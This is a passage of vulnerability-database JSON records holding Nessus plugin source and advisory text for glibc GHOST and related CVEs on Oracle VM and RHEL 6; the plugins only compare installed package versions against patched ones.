script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"glibc-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"glibc-common-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"nscd-2.12-1.166.el6_7.7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / nscd\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:48", "description": "An updated rhev-hypervisor6 package that fixes multiple security issues is now available for Red Hat Enterprise Virtualization 3.\n\nRed Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: a subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nA race condition flaw was found in the way the Linux kernel's KVM subsystem handled PIT (Programmable Interval Timer) emulation. A guest user who has access to the PIT I/O ports could use this flaw to crash the host. (CVE-2014-3611)\n\nA flaw was found in the way OpenSSL handled fragmented handshake packets. A man-in-the-middle attacker could use this flaw to force a TLS/SSL server using OpenSSL to use TLS 1.0, even if both the client and the server supported newer protocol versions. (CVE-2014-3511)\n\nA memory leak flaw was found in the way an OpenSSL handled failed session ticket integrity checks. A remote attacker could exhaust all available memory of an SSL/TLS or DTLS server by sending a large number of invalid session tickets to that server. (CVE-2014-3567)\n\nIt was found that the Linux kernel's KVM subsystem did not handle the VM exits gracefully for the invept (Invalidate Translations Derived from EPT) and invvpid (Invalidate Translations Based on VPID) instructions. On hosts with an Intel processor and invept/invppid VM exit support, an unprivileged guest user could use these instructions to crash the guest. (CVE-2014-3645, CVE-2014-3646)\n\nRed Hat would like to thank Qualys for reporting the CVE-2015-0235 issue, Lars Bull of Google for reporting the CVE-2014-3611 issue, and the Advanced Threat Research team at Intel Security for reporting the CVE-2014-3645 and CVE-2014-3646 issues.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2015-02-06T00:00:00", "type": "nessus", "title": "RHEL 6 : rhev-hypervisor6 (RHSA-2015:0126) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3511", "CVE-2014-3567", "CVE-2014-3611", "CVE-2014-3645", "CVE-2014-3646", "CVE-2015-0235"], "modified": "2021-02-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2015-0126.NASL", "href": "https://www.tenable.com/plugins/nessus/81200", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0126. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81200);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2014-3511\", \"CVE-2014-3567\", \"CVE-2014-3611\", \"CVE-2014-3645\", \"CVE-2014-3646\", \"CVE-2015-0235\");\n script_bugtraq_id(70743, 70745, 70746);\n script_xref(name:\"RHSA\", value:\"2015:0126\");\n\n script_name(english:\"RHEL 6 : rhev-hypervisor6 (RHSA-2015:0126) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An updated rhev-hypervisor6 package that fixes multiple security\nissues is now available for Red Hat Enterprise Virtualization 3.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise\nVirtualization Hypervisor ISO disk image. The Red Hat Enterprise\nVirtualization Hypervisor is a dedicated Kernel-based Virtual Machine\n(KVM) hypervisor. It includes everything necessary to run and manage\nvirtual machines: a subset of the Red Hat Enterprise Linux operating\nenvironment and the Red Hat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available\nfor the Intel 64 and AMD64 architectures with virtualization\nextensions.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nA race condition flaw was found in the way the Linux kernel's KVM\nsubsystem handled PIT (Programmable Interval Timer) emulation. A guest\nuser who has access to the PIT I/O ports could use this flaw to crash\nthe host. (CVE-2014-3611)\n\nA flaw was found in the way OpenSSL handled fragmented handshake\npackets. A man-in-the-middle attacker could use this flaw to force a\nTLS/SSL server using OpenSSL to use TLS 1.0, even if both the client\nand the server supported newer protocol versions. (CVE-2014-3511)\n\nA memory leak flaw was found in the way an OpenSSL handled failed\nsession ticket integrity checks. A remote attacker could exhaust all\navailable memory of an SSL/TLS or DTLS server by sending a large\nnumber of invalid session tickets to that server. (CVE-2014-3567)\n\nIt was found that the Linux kernel's KVM subsystem did not handle the\nVM exits gracefully for the invept (Invalidate Translations Derived\nfrom EPT) and invvpid (Invalidate Translations Based on VPID)\ninstructions. On hosts with an Intel processor and invept/invppid VM\nexit support, an unprivileged guest user could use these instructions\nto crash the guest. (CVE-2014-3645, CVE-2014-3646)\n\nRed Hat would like to thank Qualys for reporting the CVE-2015-0235\nissue, Lars Bull of Google for reporting the CVE-2014-3611 issue, and\nthe Advanced Threat Research team at Intel Security for reporting the\nCVE-2014-3645 and CVE-2014-3646 issues.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised\nto upgrade to this updated package.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3511\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected rhev-hypervisor6 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/06\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0126\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"rhev-hypervisor6-6.6-20150123.1.el6ev\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rhev-hypervisor6\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:48", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Switch to use malloc when the input line is too long [Orabug 19951108]\n\n - Use a /sys/devices/system/cpu/online for\n _SC_NPROCESSORS_ONLN implementation [Orabug 17642251] (Joe Jin)\n\n - Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183532).\n\n - Remove gconv transliteration loadable modules support (CVE-2014-5119, - _nl_find_locale: Improve handling of crafted locale names (CVE-2014-0475, \n\n - Fix patch for integer overflows in *valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Fix return code when starting an already started nscd daemon (#979413).\n\n - Fix getnameinfo for many PTR record queries (#1020486).\n\n - Return EINVAL error for negative sizees to getgroups (#995207).\n\n - Fix integer overflows in *valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Add support for newer L3 caches on x86-64 and correctly count the number of hardware threads sharing a cacheline (#1003420).\n\n - Revert incomplete fix for bug #758193.\n\n - Fix _nl_find_msg malloc failure case, and callers (#957089).\n\n - Test on init_fct, not result->__init_fct, after demangling (#816647).\n\n - Don't handle ttl == 0 specially (#929035).\n\n - Fix multibyte character processing crash in regexp (CVE-2013-0242, #951132)\n\n - Fix getaddrinfo stack overflow resulting in application crash (CVE-2013-1914, #951132)\n\n - Add missing patch to avoid use after free (#816647)\n\n - Fix race in initgroups compat_call (#706571)\n\n - Fix return value from getaddrinfo when servers are down.\n (#758193)\n\n - Fix fseek on wide character streams. Sync's seeking code with RHEL 6 (#835828)\n\n - Call feraiseexcept only if exceptions are not masked (#861871).\n\n - Always demangle function before checking for NULL value.\n (#816647).\n\n - Do not fail in ttyname if /proc is not available (#851450).\n\n - Fix errno for various overflow situations in vfprintf.\n Add missing overflow checks. (#857387)\n\n - Handle failure of _nl_explode_name in all cases (#848481)\n\n - Define the default fuzz factor to 2 to make it easier to manipulate RHEL 5 RPMs on RHEL 6 and newer systems.\n\n - Fix race in intl/* testsuite (#849202)\n\n - Fix out of bounds array access in strto* exposed by 847930 patch.\n\n - Really fix POWER4 strncmp crash (#766832).\n\n - Fix integer overflow leading to buffer overflow in strto* (#847930)\n\n - Fix race in msort/qsort (#843672)\n\n - Fix regression due to 797096 changes (#845952)\n\n - Do not use PT_IEEE_IP ptrace calls (#839572)\n\n - Update ULPs (#837852)\n\n - Fix various transcendentals in non-default rounding modes (#837852)\n\n - Fix unbound alloca in vfprintf (#826947)\n\n - Fix iconv segfault if the invalid multibyte character 0xffff is input when converting from IBM930. (#823905)\n\n - Fix fnmatch when '*' wildcard is applied on a file name containing multibyte chars. (#819430)\n\n - Fix unbound allocas use in glob_in_dir, getaddrinfo and others. (#797096)\n\n - Fix segfault when running ld.so --verify on some DSO's in current working directory. (#808342)\n\n - Incorrect initialization order for dynamic loader (#813348)\n\n - Fix return code when stopping already stopped nscd daemon (#678227)\n\n - Remove MAP_32BIT for pthread stack mappings, use MAP_STACK instead (#641094)\n\n - Fix setuid vs sighandler_setxid race (#769852)\n\n - Fix access after end of search string in regex matcher (#757887)\n\n - Fix POWER4 strncmp crash (#766832)\n\n - Fix SC_*CACHE detection for X5670 cpus (#692182)\n\n - Fix parsing IPV6 entries in /etc/resolv.conf (#703239)\n\n - Fix double-free in nss_nis code (#500767)\n\n - Add kernel VDSO support for s390x (#795896)\n\n - Fix race in malloc arena creation and make implementation match documented behaviour (#800240)\n\n - Do not override TTL of CNAME with TTL of its alias (#808014)\n\n - Fix short month names in fi_FI locale #(657266).\n\n - Fix nscd crash for group with large number of members (#788989)\n\n - Fix Slovakia currency (#799853)\n\n - Fix getent malloc failure check (#806403)\n\n - Fix short month names in zh_CN locale (#657588)\n\n - Fix decimal point symbol for Portuguese currency (#710216)\n\n - Avoid integer overflow in sbrk (#767358)\n\n - Avoid race between [,__de]allocate_stack and\n __reclaim_stacks during fork (#738665)\n\n - Fix race between IO_flush_all_lockp & pthread_cancel (#751748)\n\n - Fix memory leak in NIS endgrent (#809325)\n\n - Allow getaddr to accept SCTP socket types in hints (#765710)\n\n - Fix errno handling in vfprintf (#794814)\n\n - Filter out <built-in> when building file lists (#784646).\n\n - Avoid 'nargs' integer overflow which could be used to bypass FORTIFY_SOURCE (#794814)\n\n - Fix currency_symbol for uk_UA (#639000)\n\n - Correct test for detecting cycle during topo sort (#729661)\n\n - Check values from TZ file header (#767688)\n\n - Complete the numeric settings fix (#675259)\n\n - Complete the change for error codes from pthread_create (#707998)\n\n - Truncate time values in Linux futimes when falling back to utime (#758252)\n\n - Update systemtaparches\n\n - Add rules to build libresolv with SSP flags (#756453)\n\n - Fix PLT reference\n\n - Workaround misconfigured system (#702300)\n\n - Update systemtaparches\n\n - Correct cycle detection during dependency sorting (#729661)\n\n - Add gdb hooks (#711924)\n\n - Fix alloca accounting in strxfm and strcoll (#585433)\n\n - Correct cycle detection during dependency sorting (#729661)\n\n - ldd: never run file directly (#531160)\n\n - Implement greedy matching of weekday and month names (#657570)\n\n - Fix incorrect numeric settings (#675259)\n\n - Implement new mode for NIS passwd.adjunct.byname table (#678318)\n\n - Query NIS domain only when needed (#703345)\n\n - Count total processors using sysfs (#706894)\n\n - Translate clone error if necessary (#707998)\n\n - Workaround kernel clobbering robust list (#711531)\n\n - Use correct type when casting d_tag (#599056, CVE-2010-0830)\n\n - Report write error in addmnt even for cached streams (#688980, CVE-2011-1089)\n\n - Don't underestimate length of DST substitution (#694655)\n\n - Don't allocate executable stack when it cannot be allocated in the first 4G (#448011)\n\n - Initialize resolver state in nscd (#676039)\n\n - No cancel signal in unsafe places (#684808)\n\n - Check size of pattern in wide character representation in fnmatch (#681054)\n\n - Avoid too much stack use in fnmatch (#681054, CVE-2011-1071)\n\n - Properly quote output of locale (#625893, CVE-2011-1095)\n\n - Don't leave empty element in rpath when skipping the first element, ignore rpath elements containing non-isolated use of $ORIGIN when privileged (#667974, CVE-2011-0536)\n\n - Fix handling of newline in addmntent (#559579, CVE-2010-0296)\n\n - Don't ignore $ORIGIN in libraries (#670988)\n\n - Fix false assertion (#604796)\n\n - Fix ordering of DSO constructors and destructors (#604796)\n\n - Fix typo (#531576)\n\n - Fix concurrency problem between dl_open and dl_iterate_phdr (#649956)\n\n - Require suid bit on audit objects in privileged programs (#645678, CVE-2010-3856)\n\n - Never expand $ORIGIN in privileged programs (#643819, CVE-2010-3847)\n\n - Add timestamps to nscd logs (#527558)\n\n - Fix index wraparound handling in memusage (#531576)\n\n - Handle running out of buffer space with IPv6 mapping enabled (#533367)\n\n - Don't deadlock in __dl_iterate_phdr while (un)loading objects (#549813)\n\n - Avoid alloca in setenv for long strings (#559974)\n\n - Recognize POWER7 and ISA 2.06 (#563563)\n\n - Add support for AT_BASE_PLATFORM (#563599)\n\n - Restore locking in free_check (#585674)\n\n - Fix lookup of collation sequence value during regexp matching (#587360)\n\n - Fix POWER6 memcpy/memset (#579011)\n\n - Fix scope handling during dl_close (#593675)\n\n - Enable -fasynchronous-unwind-tables throughout (#593047)\n\n - Fix crash when aio thread creation fails (#566712)", "cvss3": {}, "published": "2015-02-02T00:00:00", "type": "nessus", "title": "OracleVM 3.2 : glibc (OVMSA-2015-0023) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0296", "CVE-2010-0830", "CVE-2010-3847", "CVE-2010-3856", "CVE-2011-0536", "CVE-2011-1071", "CVE-2011-1089", "CVE-2011-1095", "CVE-2013-0242", "CVE-2013-1914", "CVE-2013-4332", "CVE-2014-0475", "CVE-2014-5119", "CVE-2015-0235"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:glibc", "p-cpe:/a:oracle:vm:glibc-common", "p-cpe:/a:oracle:vm:nscd", "cpe:/o:oracle:vm_server:3.2"], "id": "ORACLEVM_OVMSA-2015-0023.NASL", "href": "https://www.tenable.com/plugins/nessus/81118", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2015-0023.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81118);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2010-3847\", \"CVE-2010-3856\", \"CVE-2011-0536\", \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2013-0242\", \"CVE-2013-1914\", \"CVE-2013-4332\", \"CVE-2014-0475\", \"CVE-2014-5119\", \"CVE-2015-0235\");\n script_bugtraq_id(40063, 44154, 44347, 46563, 46740, 47370, 57638, 58839, 62324, 64465, 68505, 68983, 69738, 72325);\n\n script_name(english:\"OracleVM 3.2 : glibc (OVMSA-2015-0023) (GHOST)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Switch to use malloc when the input line is too long\n [Orabug 19951108]\n\n - Use a /sys/devices/system/cpu/online for\n _SC_NPROCESSORS_ONLN implementation [Orabug 17642251]\n (Joe Jin)\n\n - Fix parsing of numeric hosts in gethostbyname_r\n (CVE-2015-0235, #1183532).\n\n - Remove gconv transliteration loadable modules support\n (CVE-2014-5119, - _nl_find_locale: Improve handling of\n crafted locale names (CVE-2014-0475, \n\n - Fix patch for integer overflows in *valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Fix return code when starting an already started nscd\n daemon (#979413).\n\n - Fix getnameinfo for many PTR record queries (#1020486).\n\n - Return EINVAL error for negative sizees to getgroups\n (#995207).\n\n - Fix integer overflows in *valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Add support for newer L3 caches on x86-64 and correctly\n count the number of hardware threads sharing a cacheline\n (#1003420).\n\n - Revert incomplete fix for bug #758193.\n\n - Fix _nl_find_msg malloc failure case, and callers\n (#957089).\n\n - Test on init_fct, not result->__init_fct, after\n demangling (#816647).\n\n - Don't handle ttl == 0 specially (#929035).\n\n - Fix multibyte character processing crash in regexp\n (CVE-2013-0242, #951132)\n\n - Fix getaddrinfo stack overflow resulting in application\n crash (CVE-2013-1914, #951132)\n\n - Add missing patch to avoid use after free (#816647)\n\n - Fix race in initgroups compat_call (#706571)\n\n - Fix return value from getaddrinfo when servers are down.\n (#758193)\n\n - Fix fseek on wide character streams. Sync's seeking code\n with RHEL 6 (#835828)\n\n - Call feraiseexcept only if exceptions are not masked\n (#861871).\n\n - Always demangle function before checking for NULL value.\n (#816647).\n\n - Do not fail in ttyname if /proc is not available\n (#851450).\n\n - Fix errno for various overflow situations in vfprintf.\n Add missing overflow checks. (#857387)\n\n - Handle failure of _nl_explode_name in all cases\n (#848481)\n\n - Define the default fuzz factor to 2 to make it easier to\n manipulate RHEL 5 RPMs on RHEL 6 and newer systems.\n\n - Fix race in intl/* testsuite (#849202)\n\n - Fix out of bounds array access in strto* exposed by\n 847930 patch.\n\n - Really fix POWER4 strncmp crash (#766832).\n\n - Fix integer overflow leading to buffer overflow in\n strto* (#847930)\n\n - Fix race in msort/qsort (#843672)\n\n - Fix regression due to 797096 changes (#845952)\n\n - Do not use PT_IEEE_IP ptrace calls (#839572)\n\n - Update ULPs (#837852)\n\n - Fix various transcendentals in non-default rounding\n modes (#837852)\n\n - Fix unbound alloca in vfprintf (#826947)\n\n - Fix iconv segfault if the invalid multibyte character\n 0xffff is input when converting from IBM930. (#823905)\n\n - Fix fnmatch when '*' wildcard is applied on a file name\n containing multibyte chars. (#819430)\n\n - Fix unbound allocas use in glob_in_dir, getaddrinfo and\n others. (#797096)\n\n - Fix segfault when running ld.so --verify on some DSO's\n in current working directory. (#808342)\n\n - Incorrect initialization order for dynamic loader\n (#813348)\n\n - Fix return code when stopping already stopped nscd\n daemon (#678227)\n\n - Remove MAP_32BIT for pthread stack mappings, use\n MAP_STACK instead (#641094)\n\n - Fix setuid vs sighandler_setxid race (#769852)\n\n - Fix access after end of search string in regex matcher\n (#757887)\n\n - Fix POWER4 strncmp crash (#766832)\n\n - Fix SC_*CACHE detection for X5670 cpus (#692182)\n\n - Fix parsing IPV6 entries in /etc/resolv.conf (#703239)\n\n - Fix double-free in nss_nis code (#500767)\n\n - Add kernel VDSO support for s390x (#795896)\n\n - Fix race in malloc arena creation and make\n implementation match documented behaviour (#800240)\n\n - Do not override TTL of CNAME with TTL of its alias\n (#808014)\n\n - Fix short month names in fi_FI locale #(657266).\n\n - Fix nscd crash for group with large number of members\n (#788989)\n\n - Fix Slovakia currency (#799853)\n\n - Fix getent malloc failure check (#806403)\n\n - Fix short month names in zh_CN locale (#657588)\n\n - Fix decimal point symbol for Portuguese currency\n (#710216)\n\n - Avoid integer overflow in sbrk (#767358)\n\n - Avoid race between [,__de]allocate_stack and\n __reclaim_stacks during fork (#738665)\n\n - Fix race between IO_flush_all_lockp & pthread_cancel\n (#751748)\n\n - Fix memory leak in NIS endgrent (#809325)\n\n - Allow getaddr to accept SCTP socket types in hints\n (#765710)\n\n - Fix errno handling in vfprintf (#794814)\n\n - Filter out <built-in> when building file lists\n (#784646).\n\n - Avoid 'nargs' integer overflow which could be used to\n bypass FORTIFY_SOURCE (#794814)\n\n - Fix currency_symbol for uk_UA (#639000)\n\n - Correct test for detecting cycle during topo sort\n (#729661)\n\n - Check values from TZ file header (#767688)\n\n - Complete the numeric settings fix (#675259)\n\n - Complete the change for error codes from pthread_create\n (#707998)\n\n - Truncate time values in Linux futimes when falling back\n to utime (#758252)\n\n - Update systemtaparches\n\n - Add rules to build libresolv with SSP flags (#756453)\n\n - Fix PLT reference\n\n - Workaround misconfigured system (#702300)\n\n - Update systemtaparches\n\n - Correct cycle detection during dependency sorting\n (#729661)\n\n - Add gdb hooks (#711924)\n\n - Fix alloca accounting in strxfm and strcoll (#585433)\n\n - Correct cycle 